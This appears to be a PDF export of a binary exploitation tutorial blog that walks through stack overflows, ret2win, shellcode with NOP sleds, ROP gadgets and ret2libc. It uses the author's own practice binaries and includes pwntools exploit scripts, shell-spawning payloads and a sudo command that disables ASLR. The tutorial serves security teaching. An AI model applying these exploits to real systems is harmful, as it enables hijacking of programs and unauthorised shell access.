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4/10/24, 12:28 PM Binary Exploitation

Binary Exploitation Notes

Welcome to my blog! There's a lot here and it's a bit spread out, so here's a guide:

If you're looking for the binary exploitation notes, you're in the right place! Here I
make notes on most of the things I learn, and also provide vulnerable binaries to
allow you to have a go yourself. Most "common" stack techniques are mentioned
along with some super introductory heap; more will come soon™.
If you're looking for my maths notes, they are split up (with some overlap):

All my other maths notes can be found on Notion here. I realise having it in
multiple locations is annoying, but maths support in Notion is just wayyy better.
Like so much better. Sorry.
Hopefully these two get moulded into one soon

If you'd like to find me elsewhere, I'm usually down as ir0nstone. The accounts you'd
actually be interested in seeing are likely my HackTheBox account or my Twitter (or X, if
you really prefer).

If this resource has been helpful to you, please consider supporting me on

buymeacoffee :)

And, of course, thanks to GitBook for all of their support :)

~ Andrej Ljubic 2/240
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Types 3/240
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Stack 4/240
4/10/24, 12:28 PM Binary Exploitation

An introduction to binary exploitation

Binary Exploitation is about finding vulnerabilities in programs and utilising them to

do what you wish. Sometimes this can result in an authentication bypass or the leaking
of classified information, but occasionally (if you're lucky) it can also result in Remote
Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a
region of memory that stores temporary variables created by functions in code.

When a new function is called, a memory address in the calling function is pushed to
the stack - this way, the program knows where to return to once the called function
finishes execution. Let's look at a basic binary to show this.

The binary has two files - source.c and vuln ; the latter is an ELF file, which is the
executable format for Linux (it is recommended to follow along with this with a Virtual
Machine of your own, preferably Linux).

We're gonna use a tool called radare2 to analyse the behaviour of the binary when
functions are called.

$ r2 -d -A vuln

The -d runs it while the -A performs analysis. We can disassemble main with

s main; pdf

s main seeks (moves) to main, while pdf stands for Print Disassembly Function
(literally just disassembles it). 5/240
4/10/24, 12:28 PM Binary Exploitation

0x080491ab 55 push ebp

0x080491ac 89e5 mov ebp, esp
0x080491ae 83e4f0 and esp, 0xfffffff0
0x080491b1 e80d000000 call
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
0x080491c1 c9 leave
0x080491c2 c3 ret

The call to unsafe is at 0x080491bb , so let's break there.

db 0x080491bb

db stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply
somewhere which, when reached, pauses the program for you to run other commands.
Now we run dc for debug continue; this just carries on running the file.

It should break before unsafe is called; let's analyse the top of the stack now:

[0x08049172]> pxw @ esp

0xff984af0 0xf7efe000 [...]

pxw tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first
value here, which is 0xf7efe000 . This value is stored at the top of the stack, as ESP
points to the top of the stack - in this case, that is 0xff984af0 .

Note that the value 0xf7efe000 is random - it's an artefact of previous processes that
have used that part of the stack. The stack is never wiped, it's just marked as usable, so
before data actually gets put there the value is completely dependent on your system.

Let's move one more instruction with ds , debug step, and check the stack again. This
will execute the call sym.unsafe instruction.

[0x08049172]> pxw @ esp

0xff984aec 0x080491c0 0xf7efe000 [...] 6/240
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Huh, something's been pushed onto the top of the stack - the value 0x080491c0 . This
looks like it's in the binary - but where? Let's look back at the disassembly from before:

0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop

We can see that 0x080491c0 is the memory address of the instruction after the call to
unsafe . Why? This is how the program knows where to return to after unsafe() has

But as we're interested in binary exploitation, let's see how we can possibly break this.
First, let's disassemble unsafe and break on the ret instruction; ret is the
equivalent of pop eip , which will get the saved return pointer we just analysed on the
stack into the eip register. Then let's continue and spam a bunch of characters into
the input and see how that could affect it.

[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me

Now let's read the value at the location the return pointer was at previously, which as
we saw was 0xff984aec .

[0x080491aa]> pxw @ 0xff984aec

0xff984aec 0x41414141 0x41414141 0x41414141 0x41414141 AAAAAAAAAAAAAAAA


It's quite simple - we inputted more data than the program expected, which resulted in
us overwriting more of the stack than the developer expected. The saved return 7/240
4/10/24, 12:28 PM Binary Exploitation

pointer is also on the stack, meaning we managed to overwrite it. As a result, on the
ret , the value popped into eip won't be in the previous function but rather
0x41414141 . Let's check with ds .

[0x080491aa]> ds

And look at the new prompt - 0x41414141 . Let's run dr eip to make sure that's the
value in eip :

[0x41414141]> dr eip

Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes
when we let it run with dc .

[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0

radare2 is very useful and prints out the address that causes it to crash. If you cause
the program to crash outside of a debugger, it will usually say Segmentation Fault ,
which could mean a variety of things, but usually that you have overwritten EIP.

Of course, you can prevent people from writing more characters than expected when
making your program, usually using other C functions such as fgets() ; gets() is
intrinsically unsafe because it doesn't check the length of the input, meaning that the
presence of gets() is always something you should check out in a program. It is also
possible to give fgets() the wrong parameters, meaning it still takes in too many

When a function calls another function, it 8/240
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pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again

Because this value is saved on the stack, just like our local variables, if we write more
characters than the program expects, we can overwrite the value and redirect code
execution to wherever we wish. Functions such as fgets() can prevent such easy
overflow, but you should check how much is actually being read. 9/240
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The most basic binexp challenge

A ret2win is simply a binary where there is a win() function (or equivalent); once you
successfully redirect execution there, you complete the challenge.

To carry this out, we have to leverage what we learnt in the introduction, but in a
predictable manner - we have to overwrite EIP, but to a specific value of our choice.

To do this, what do we need to know? Well, a couple things:

The padding until we begin to overwrite the return pointer (EIP)

What value we want to overwrite EIP to

When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped
into EIP. The EIP register is not located on the stack, so it is not overwritten directly.

Finding the Padding

This can be found using simple trial and error; if we send a variable numbers of
characters, we can use the Segmentation Fault message, in combination with
radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute
force (we'll cover this in the next post), but it'll do for now.

You may get a segmentation fault for reasons other than overwriting EIP; use a debugger
to make sure the padding is correct.

We get an offset of 52 bytes.

Finding the Address 10/240
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Now we need to find the address of the flag() function in the binary. This is simple.

$ r2 -d -A vuln
$ afl
0x080491c3 1 43 sym.flag

afl stands for Analyse Functions List

The flag() function is at 0x080491c3 .

Using the Information

The final piece of the puzzle is to work out how we can send the address we want. If
you think back to the introduction, the A s that we sent became 0x41 - which is the
ASCII code of A . So the solution is simple - let's just find the characters with ascii
codes 0x08 , 0x04 , 0x91 and 0xc3 .

This is a lot simpler than you might think, because we can specify them in python as

address = '\x08\x04\x91\xc3'

And that makes it much easier.

Putting it Together

Now we know the padding and the value, let's exploit the binary! We can use
pwntools to interface with the binary (check out the pwntools posts for a more in-
depth look). 11/240
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from pwn import * # This is how we import pwntools

p = process('./vuln') # We're starting a new process

payload = 'A' * 52
payload += '\x08\x04\x91\xc3'

p.clean() # Receive all the text

p.sendline(payload) # Output the "Exploited!" string to know we succ

If you run this, there is one small problem: it won't work. Why? Let's check with a
debugger. We'll put in a pause() to give us time to attach radare2 onto the process.

from pwn import *

p = process('./vuln')

payload = b'A' * 52
payload += '\x08\x04\x91\xc3'

pause() # add this in


Now let's run the script with python3 and then open up a new terminal

r2 -d -A $(pidof vuln)

By providing the PID of the process, radare2 hooks onto it. Let's break at the return of
unsafe() and read the value of the return pointer. 12/240
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[0x08049172]> db 0x080491aa
[0x08049172]> dc

<< press any button on the exploit terminal window >>

hit breakpoint at: 80491aa

[0x080491aa]> pxw @ esp
0xffdb0f7c 0xc3910408 [...]

0xc3910408 - look familiar? It's the address we were trying to send over, except the
bytes have been reversed, and the reason for this reversal is endianness. Big-endian
systems store the most significant byte (the byte with the largest value) at the
smallest memory address, and this is how we sent them. Little-endian does the
opposite (for a reason), and most binaries you will come across are little-endian. As far
as we're concerned, the byte are stored in reverse order in little-endian executables.

Finding the Endianness

radare2 comes with a nice tool called rabin2 for binary analysis:

$ rabin2 -I vuln
endian little

So our binary is little-endian.

Accounting for Endianness

The fix is simple - reverse the address (you can also remove the pause() )

payload += '\x08\x04\x91\xc3'[::-1]

If you run this now, it will work: 13/240
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$ python3
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!

And wham, you've called the flag() function! Congrats!

Pwntools and Endianness

Unsurprisingly, you're not the first person to have thought "could they possibly make
endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!

payload += '\x08\x04\x91\xc3'[::-1]


payload += p32(0x080491c3)

Much simpler, right?

The only caveat is that it returns bytes rather than a string, so you have to make the
padding a byte string:

payload = b'A' * 52 # Notice the "b"

Otherwise you will get a

TypeError: can only concatenate str (not "bytes") to str

Final Exploit 14/240
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from pwn import * # This is how we import pwntools

p = process('./vuln') # We're starting a new process

payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it # Receive all the text

p.sendline(payload) # Output the "Exploited!" string to know we 15/240
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De Bruijn Sequences
The better way to calculate offsets

De Bruijn sequences of order n is simply a sequence where no string of n

characters is repeated. This makes finding the offset until EIP much simpler - we can
just pass in a De Bruijn sequence, get the value within EIP and find the one possible
match within the sequence to calculate the offset. Let's do this on the ret2win binary.

Generating the Pattern

Again, radare2 comes with a nice command-line tool (called ragg2 ) that can
generate it for us. Let's create a sequence of length 100 .

$ ragg2 -P 100 -r

The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.

Using the Pattern

Now we have the pattern, let's just input it in radare2 when prompted for input, make
it crash and then calculate how far along the sequence the EIP is. Simples.

$ r2 -d -A vuln

[0xf7ede0b0]> dc
Overflow me
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0

The address it crashes on is 0x41534141 ; we can use radare2 's in-built wopO
command to work out the offset. 16/240
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[0x41534141]> wopO 0x41534141


Awesome - we get the correct value!

We can also be lazy and not copy the value.

[0x41534141]> wopO `dr eip`


The backticks means the dr eip is calculated first, before the wopO is run on the
result of it. 17/240
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Running your own code

In real exploits, it's not particularly likely that you will have a win() function lying
around - shellcode is a way to run your own instructions, giving you the ability to run
arbitrary commands on the system.

Shellcode is essentially assembly instructions, except we input them into the binary;
once we input it, we overwrite the return pointer to hijack code execution and point at
our own instructions!

I promise you can trust me but you should never ever run shellcode without knowing what
it does. Pwntools is safe and has almost all the shellcode you will ever need.

The reason shellcode is successful is that Von Neumann architecture (the architecture
used in most computers today) does not differentiate between data and instructions -
it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore,
even though our input is data, the computer doesn't know that - and we can use that to
our advantage.

Disabling ASLR

ASLR is a security technique, and while it is not specifically designed to combat

shellcode, it involves randomising certain aspects of memory (we will talk about it in
much more detail later). This randomisation can make shellcode exploits like the one
we're about to do more less reliable, so we'll be disabling it for now using this.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Again, you should never run commands if you don't know what they do 18/240
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Finding the Buffer in Memory

Let's debug vuln() using radare2 and work out where in memory the buffer starts;
this is where we want to point the return pointer to.

$ r2 -d -A vuln

[0xf7fd40b0]> s sym.unsafe ; pdf

; var int32_t var_134h @ ebp-0x134

This value that gets printed out is a local variable - due to its size, it's fairly likely to be
the buffer. Let's set a breakpoint just after gets() and find the exact address.

[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....


It appears to be at 0xffffcfd4 ; if we run the binary multiple times, it should remain

where it is (if it doesn't, make sure ASLR is disabled!).

Finding the Padding

Now we need to calculate the padding until the return pointer. We'll use the De Bruijn
sequence as explained in the previous blog post. 19/240
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$ ragg2 -P 400 -r
<copy this>

$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`

The padding is 312 bytes.

Putting it all together

In order for the shellcode to be correct, we're going to set context.binary to our
binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us
with working shellcode.

from pwn import *

context.binary = ELF('./vuln')

p = process()

We can use just process() because once context.binary is set it is assumed to use
that process

Now we can use pwntools' awesome shellcode functionality to make it incredibly


payload = asm( # The shellcode

payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode

Yup, that's it. Now let's send it off and use p.interactive() , which enables us to
communicate to the shell. 20/240
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If you're getting an EOFError , print out the shellcode and try to find it in memory - the
stack address may be wrong

$ python3
[*] 'vuln'
Arch: i386-32-little
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
$ ls source.c vuln

And it works! Awesome.

Final Exploit 21/240
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from pwn import *

context.binary = ELF('./vuln')

p = process()

payload = asm( # The shellcode

payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode




We injected shellcode, a series of assembly instructions, when prompted for input

We then hijacked code execution by overwriting the saved return pointer on the
stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell
for arbitrary command execution 22/240
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More reliable shellcode exploits

NOP (no operation) instructions do exactly what they sound like: nothing. Which makes
then very useful for shellcode exploits, because all they will do is run the next
instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of
them, it'll simply keep doing no instructions until it reaches our actual shellcode. This
allows us a greater margin of error as a shift of a few bytes forward or backwards won't
really affect it, it'll just run a different number of NOP instructions - which have the
same end result of running the shellcode. This padding with NOPs is often called a NOP
slide or NOP sled, since the EIP is essentially sliding down them.

In intel x86 assembly, NOP instructions are \x90 .

The NOP instruction actually used to stand for XCHG EAX, EAX , which does effectively
nothing. You can read a bit more about it on this StackOverflow question.

Updating our Shellcode Exploit

We can make slight changes to our exploit to do two things:

Add a large number of NOPs on the left

Adjust our return pointer to point at the middle of the NOPs rather than the buffer

Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust
your previous exploit as the buffer location my be different. 23/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

context.binary = ELF('./vuln')

p = process()

payload = b'\x90' * 240 # The NOPs

payload += asm( # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half no



It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive
unexpected errors padding with NOPs but the shellcode worked before, try reducing the
length of the nopsled as it may be tampering with other things on the stack

Note that NOPs are only \x90 in certain architectures, and if you need others you can
use pwntools:

nop = asm(shellcraft.nop()) 24/240
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32- vs 64-bit
The differences between the sizes

Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing
you would need to change is switch out the p32() for p64() as the memory
addresses are longer.

The real difference between the two, however, is the way you pass parameters to
functions (which we'll be looking at much closer soon); in 32-bit, all parameters are
pushed to the stack before the function is called. In 64-bit, however, the first 6 are
stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling
convention. Note that different Operating Systems also have different calling
conventions. 25/240
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No eXecute
The defence against shellcode

As you can expect, programmers were hardly pleased that people could inject their
own instructions into the program. The NX bit, which stands for No eXecute, defines
areas of memory as either instructions or data. This means that your input will be
stored as data, and any attempt to run it as instructions will crash the program,
effectively neutralising shellcode.

To get around NX, exploit developers have to leverage a technique called ROP, Return-
Oriented Programming.

The Windows version of NX is DEP, which stands for Data Execution Prevention

Checking for NX

You can either use pwntools' checksec or rabin2 .

$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

$ rabin2 -I vuln
nx false
[...] 26/240
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Return-Oriented Programming
Bypassing NX

The basis of ROP is chaining together small chunks of code already present within the
binary itself in such a way to do what you wish. This often involves passing parameters
to functions already present within libc , such as system - if you can find the location
of a command, such as cat flag.txt , and then pass it as a parameter to system , it
will execute that command and return the output. A more dangerous command is
/bin/sh , which when run by system gives the attacker a shell much like the
shellcode we used did.

Doing this, however, is not as simple as it may seem at first. To be able to properly call
functions, we first have to understand how to pass parameters to them. 27/240
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Calling Conventions
A more in-depth look into parameters for 32-bit and 64-bit programs

One Parameter

Let's have a quick look at the source:

#include <stdio.h>

void vuln(int check) {

if(check == 0xdeadbeef) {
} else {
puts("Not nice!");

int main() {

Pretty simple.

If we run the 32-bit and 64-bit versions, we get the same output:

Not nice!

Just what we expected. 28/240
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Analysing 32-bit

Let's open the binary up in radare2 and disassemble it.

$ r2 -d -A vuln-32
$ s main; pdf

0x080491ac 8d4c2404 lea ecx, [argv]

0x080491b0 83e4f0 and esp, 0xfffffff0
0x080491b3 ff71fc push dword [ecx - 4]
0x080491b6 55 push ebp
0x080491b7 89e5 mov ebp, esp
0x080491b9 51 push ecx
0x080491ba 83ec04 sub esp, 4
0x080491bd e832000000 call
0x080491c2 053e2e0000 add eax, 0x2e3e
0x080491c7 83ec0c sub esp, 0xc
0x080491ca 68efbeadde push 0xdeadbeef
0x080491cf e88effffff call sym.vuln
0x080491d4 83c410 add esp, 0x10
0x080491d7 83ec0c sub esp, 0xc
0x080491da 68dec0adde push 0xdeadc0de
0x080491df e87effffff call sym.vuln
0x080491e4 83c410 add esp, 0x10
0x080491e7 b800000000 mov eax, 0
0x080491ec 8b4dfc mov ecx, dword [var_4h]
0x080491ef c9 leave
0x080491f0 8d61fc lea esp, [ecx - 4]
0x080491f3 c3 ret

If we look closely at the calls to sym.vuln , we see a pattern:

push 0xdeadbeef
call sym.vuln
push 0xdeadc0de
call sym.vuln

We literally push the parameter to the stack before calling the function. Let's break
on sym.vuln . 29/240
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[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c 0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c

The first value there is the return pointer that we talked about before - the second,
however, is the parameter. This makes sense because the return pointer gets pushed
during the call , so it should be at the top of the stack. Now let's disassemble
sym.vuln .

┌ 74: sym.vuln (int32_t arg_8h);

│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x08049162 b 55 push ebp
│ 0x08049163 89e5 mov ebp, esp
│ 0x08049165 53 push ebx
│ 0x08049166 83ec04 sub esp, 4
│ 0x08049169 e886000000 call
│ 0x0804916e 05922e0000 add eax, 0x2e92
│ 0x08049173 817d08efbead. cmp dword [arg_8h], 0xdeadbeef
│ ┌─< 0x0804917a 7516 jne 0x8049192
│ │ 0x0804917c 83ec0c sub esp, 0xc
│ │ 0x0804917f 8d9008e0ffff lea edx, [eax - 0x1ff8]
│ │ 0x08049185 52 push edx
│ │ 0x08049186 89c3 mov ebx, eax
│ │ 0x08049188 e8a3feffff call sym.imp.puts ;
│ │ 0x0804918d 83c410 add esp, 0x10
│ ┌──< 0x08049190 eb14 jmp 0x80491a6
│ │└─> 0x08049192 83ec0c sub esp, 0xc
│ │ 0x08049195 8d900ee0ffff lea edx, [eax - 0x1ff2]
│ │ 0x0804919b 52 push edx
│ │ 0x0804919c 89c3 mov ebx, eax
│ │ 0x0804919e e88dfeffff call sym.imp.puts ;
│ │ 0x080491a3 83c410 add esp, 0x10
│ │ ; CODE XREF from sym.vuln @ 0x8049190
│ └──> 0x080491a6 90 nop
│ 0x080491a7 8b5dfc mov ebx, dword [var_4h]
│ 0x080491aa c9 leave
└ 0x080491ab c3 ret

Here I'm showing the full output of the command because a lot of it is relevant.
radare2 does a great job of detecting local variables - as you can see at the top, there 30/240
4/10/24, 12:28 PM Binary Exploitation

is one called arg_8h . Later this same one is compared to 0xdeadbeef :

cmp dword [arg_8h], 0xdeadbeef

Clearly that's our parameter.

So now we know, when there's one parameter, it gets pushed to the stack so that the
stack looks like:

return address param_1

Analysing 64-bit

Let's disassemble main again here.

0x00401153 55 push rbp

0x00401154 4889e5 mov rbp, rsp
0x00401157 bfefbeadde mov edi, 0xdeadbeef
0x0040115c e8c1ffffff call sym.vuln
0x00401161 bfdec0adde mov edi, 0xdeadc0de
0x00401166 e8b7ffffff call sym.vuln
0x0040116b b800000000 mov eax, 0
0x00401170 5d pop rbp
0x00401171 c3 ret

Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in
the disassembly here it's edi , but edi is just the lower 32 bits of rdi , and the
parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again
we can check rdi with the command

dr rdi

Just dr will display all registers 31/240
4/10/24, 12:28 PM Binary Exploitation

[0x00401153]> db sym.vuln
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi


Registers are used for parameters, but the return address is still pushed onto the stack
and in ROP is placed right after the function address

Multiple Parameters


#include <stdio.h>

void vuln(int check, int check2, int check3) {

if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00
} else {
puts("Not nice!");

int main() {
vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
vuln(0xdeadc0de, 0x12345678, 0xabcdef10);

32-bit 32/240
4/10/24, 12:28 PM Binary Exploitation

We've seen the full disassembly of an almost identical binary, so I'll only isolate the
important parts.

0x080491dd 680dd0dec0 push 0xc0ded00d

0x080491e2 68dec0adde push 0xdeadc0de
0x080491e7 68efbeadde push 0xdeadbeef
0x080491ec e871ffffff call sym.vuln
0x080491f7 6810efcdab push 0xabcdef10
0x080491fc 6878563412 push 0x12345678
0x08049201 68dec0adde push 0xdeadc0de
0x08049206 e857ffffff call sym.vuln

It's just as simple - push them in reverse order of how they're passed in. The reverse
order becomes helpful when you db sym.vuln and print out the stack.

[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc 0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d

So it becomes quite clear how more parameters are placed on the stack:

return pointer param1 param2 param3 [...]


0x00401170 ba0dd0dec0 mov edx, 0xc0ded00d

0x00401175 bedec0adde mov esi, 0xdeadc0de
0x0040117a bfefbeadde mov edi, 0xdeadbeef
0x0040117f e89effffff call sym.vuln
0x00401184 ba10efcdab mov edx, 0xabcdef10
0x00401189 be78563412 mov esi, 0x12345678
0x0040118e bfdec0adde mov edi, 0xdeadc0de
0x00401193 e88affffff call sym.vuln

So as well as rdi , we also push to rdx and rsi (or, in this case, their lower 32 bits). 33/240
4/10/24, 12:28 PM Binary Exploitation

Bigger 64-bit values

Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the
original one-parameter code to utilise a bigger number:

#include <stdio.h>

void vuln(long check) {

if(check == 0xdeadbeefc0dedd00d) {

int main() {

If you disassemble main , you can see it disassembles to

movabs rdi, 0xdeadbeefc0ded00d

call sym.vuln

movabs can be used to encode the mov instruction for 64-bit instructions - treat it as if
it's a mov . 34/240
4/10/24, 12:28 PM Binary Exploitation

Controlling execution with snippets of code

Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret .
We can manipulate the ret of these gadgets in such a way as to string together a
large chain of them to do what we want.


Let's for a minute pretend the stack looks like this during the execution of a
pop rdi; ret gadget.

What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the
stack during the pop rdi . Once the pop occurs, rsp moves: 35/240
4/10/24, 12:28 PM Binary Exploitation

And since ret is equivalent to pop rip , 0x5655576724 gets moved into rip . Note
how the stack is laid out for this.

Utilising Gadgets

When we overwrite the return pointer, we overwrite the value pointed at by rsp .
Once that value is popped, it points at the next value at the stack - but wait. We can
overwrite the next value in the stack.

Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop
0x100 into rdi then jump to flag() . Let's step-by-step the execution. 36/240
4/10/24, 12:28 PM Binary Exploitation

On the original ret , which we overwrite the return pointer for, we pop the gadget
address in. Now rip moves to point to the gadget, and rsp moves to the next
memory address.

rsp moves to the 0x100 ; rip to the pop rdi . Now when we pop, 0x100 gets
moved into rdi . 37/240
4/10/24, 12:28 PM Binary Exploitation

RSP moves onto the next items on the stack, the address of flag() . The ret is
executed and flag() is called.


Essentially, if the gadget pops values from the stack, simply place those values
afterwards (including the pop rip in ret ). If we want to pop 0x10 into rdi and
then jump to 0x16 , our payload would look like this:

Note if you have multiple pop instructions, you can just add more values. 38/240
4/10/24, 12:28 PM Binary Exploitation

We use rdi as an example because, if you remember, that's the register for the first
parameter in 64-bit. This means control of this register using this gadget is important.

Finding Gadgets

We can use the tool ROPgadget to find possible gadgets.

$ ROPgadget --binary vuln-64

Gadgets information
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jm

Combine it with grep to look for specific registers.

$ ROPgadget --binary vuln-64 | grep rdi

0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax

0x00000000004011db : pop rdi ; ret 39/240
4/10/24, 12:28 PM Binary Exploitation

Exploiting Calling Conventions

Utilising Calling Conventions
5KB archive


The program expects the stack to be laid out like this before executing the function:

So why don't we provide it like that? As well as the function, we also pass the return
address and the parameters.

Everything after the address of flag() will be part of the stack frame for the next
function as it is expected to be there - just instead of using push instructions we just
overwrote them manually.

from pwn import *

p = process('./vuln-32')

payload = b'A' * 52 # Padding up to EIP

payload += p32(0x080491c7) # Address of flag()
payload += p32(0x0) # Return address - don't care if crashes w
payload += p32(0xdeadc0de) # First parameter
payload += p32(0xc0ded00d) # Second parameter
p.sendline(payload) 40/240
4/10/24, 12:28 PM Binary Exploitation


Same logic, except we have to utilise the gadgets we talked about previously to fill the
required registers (in this case rdi and rsi as we have two parameters).

We have to fill the registers before the function is called

from pwn import *

p = process('./vuln-64')

POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9

payload = b'A' * 56 # Padding

payload += p64(POP_RDI) # pop rdi; ret
payload += p64(0xdeadc0de) # value into rdi -> first param
payload += p64(POP_RSI_R15) # pop rsi; pop r15; ret
payload += p64(0xc0ded00d) # value into rsi -> first param
payload += p64(0x0) # value into r15 -> not important
payload += p64(0x40116f) # Address of flag()
payload += p64(0x0)
p.sendline(payload) 41/240
4/10/24, 12:28 PM Binary Exploitation

The standard ROP exploit

A ret2libc is based off the system function found within the C library. This function
executes anything passed to it making it the best target. Another thing found within
libc is the string /bin/sh ; if you pass this string to system , it will pop a shell.

And that is the entire basis of it - passing /bin/sh as a parameter to system . Doesn't
sound too bad, right?

Disabling ASLR
To start with, we are going to disable ASLR. ASLR randomises the location of libc in
memory, meaning we cannot (without other steps) work out the location of system
and /bin/sh . To understand the general theory, we will start with it disabled.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Manual Exploitation

Getting Libc and its base

Fortunately Linux has a command called ldd for dynamic linking. If we run it on our
compiled ELF file, it'll tell us the libraries it uses and their base addresses.

$ ldd vuln-32 (0xf7fd2000) => /lib32/ (0xf7dc2000)
/lib/ (0xf7fd3000) 42/240
4/10/24, 12:28 PM Binary Exploitation

We need , so the base address of libc is 0xf7dc2000 .

Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem
- it just means you have a different libc version. Make sure you use your values.

Getting the location of system()

To call system, we obviously need its location in memory. We can use the readelf
command for this.

$ readelf -s /lib32/ | grep system

1534: 00044f00 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0

The -s flag tells readelf to search for symbols, for example functions. Here we can
find the offset of system from libc base is 0x44f00 .

Getting the location of /bin/sh

Since /bin/sh is just a string, we can use strings on the dynamic library we just
found with ldd . Note that when passing strings as parameters you need to pass a
pointer to the string, not the hex representation of the string, because that's how C
expects it.

$ strings -a -t x /lib32/ | grep /bin/sh

18c32b /bin/sh

-a tells it to scan the entire file; -t x tells it to output the offset in hex.

32-bit Exploit 43/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

p = process('./vuln-32')

libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b

payload = b'A' * 76 # The padding

payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get t
payload += p32(binsh) # pointer to command: /bin/sh


64-bit Exploit

Repeat the process with the libc linked to the 64-bit exploit (should be called
something like /lib/x86_64-linux-gnu/ ).

Note that instead of passing the parameter in after the return pointer, you will have to
use a pop rdi; ret gadget to put it into the RDI register.

$ ROPgadget --binary vuln-64 | grep rdi

0x00000000004011cb : pop rdi ; ret 44/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

p = process('./vuln-64')

libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143

POP_RDI = 0x4011cb

payload = b'A' * 72 # The padding

payload += p64(POP_RDI) # gadget -> pop rdi; ret
payload += p64(binsh) # pointer to command: /bin/sh
payload += p64(system) # Location of system
payload += p64(0x0) # return pointer - not important once we get t


Automating with Pwntools

Unsurprisingly, pwntools has a bunch of features that make this much simpler. 45/240
4/10/24, 12:28 PM Binary Exploitation

# 32-bit
from pwn import *

elf = context.binary = ELF('./vuln-32')

p = process()

libc = elf.libc # Simply grab the libc it's runnin

libc.address = 0xf7dc2000 # Set base address

system = libc.sym['system'] # Grab location of system

binsh = next('/bin/sh')) # grab string location

payload = b'A' * 76 # The padding

payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get t
payload += p32(binsh) # pointer to command: /bin/sh


The 64-bit looks essentially the same.

Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them
here. 46/240
4/10/24, 12:28 PM Binary Exploitation

Stack Alignment
A minor issue

A small issue you may get when pwning on 64-bit systems is that your exploit works
perfectly locally but fails remotely - or even fails when you try to use the provided LIBC
version rather than your local one. This arises due to something called stack alignment.

Essentially the x86-64 ABI (application binary interface) guarantees 16-byte alignment
on a call instruction. LIBC takes advantage of this and uses SSE data transfer
instructions to optimise execution; system in particular utilises instructions such as
movaps .

That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 -
the ROP chain will fail on system .

